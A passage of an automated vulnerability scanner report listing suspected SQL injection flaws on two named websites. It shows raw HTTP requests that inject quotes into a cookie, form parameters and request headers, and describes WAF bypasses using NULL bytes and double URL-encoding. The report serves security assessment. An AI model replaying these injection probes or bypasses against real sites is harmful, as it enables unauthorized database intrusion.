User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444%2527; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865589; expires=Thu, 04-Oct-2012 18:46:29 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444%2527%2527; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865590; expires=Thu, 04-Oct-2012 18:46:30 GMT; path=/
Location: http://theplatform.com/search/noresults/bc9e290325e7d168813766272e53c250/
Content-Length: 0
Connection: close
Content-Type: text/html


1.12. http://theplatform.com/ [exp_tracker cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D%00'; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865603; expires=Thu, 04-Oct-2012 18:46:43 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D%00''; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865603; expires=Thu, 04-Oct-2012 18:46:44 GMT; path=/
Location: http://theplatform.com/search/noresults/dd66db1dd175a14bc16f418967b23d8c/
Content-Length: 0
Connection: close
Content-Type: text/html


1.13. http://theplatform.com/ [keywords parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The keywords parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1&keywords=xss+bond+interest+roi%00'&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865568; expires=Thu, 04-Oct-2012 18:46:08 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1&keywords=xss+bond+interest+roi%00''&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865569; expires=Thu, 04-Oct-2012 18:46:09 GMT; path=/
Location: http://theplatform.com/search/noresults/2eaa57dfc66eb1dfcc53b777ec4443ba/
Content-Length: 0
Connection: close
Content-Type: text/html


1.14. http://theplatform.com/ [site_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1%00'&keywords=xss+bond+interest+roi&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865563; expires=Thu, 04-Oct-2012 18:46:03 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1%00''&keywords=xss+bond+interest+roi&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865564; expires=Thu, 04-Oct-2012 18:46:04 GMT; path=/
Location: http://theplatform.com/search/noresults/7e4dd92e8c4e835028c07fea2c209122/
Content-Length: 0
Connection: close
Content-Type: text/html


1.15. http://theplatform.com/ [where parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The where parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the where parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the where request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all%2527&site_id=1&keywords=xss+bond+interest+roi&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:45:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865559; expires=Thu, 04-Oct-2012 18:45:59 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all%2527%2527&site_id=1&keywords=xss+bond+interest+roi&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:45:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865560; expires=Thu, 04-Oct-2012 18:46:00 GMT; path=/
Location: http://theplatform.com/search/noresults/f4d861309cae582888a56d8366620105/
Content-Length: 0
Connection: close
Content-Type: text/html


1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q='
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:33 GMT
Expires: Wed, 05 Oct 2011 18:40:33 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-6d47ec0c
Content-Length: 775
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutlet
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:33 GMT
Expires: Wed, 05 Oct 2011 18:40:34 GMT
Location: http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_300x60.jpg
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-8f70cee1
Content-Length: 228
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3
...[SNIP]...

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:31 GMT
Expires: Wed, 05 Oct 2011 18:40:31 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-b540ebd4
Content-Length: 706
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId = 66922
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
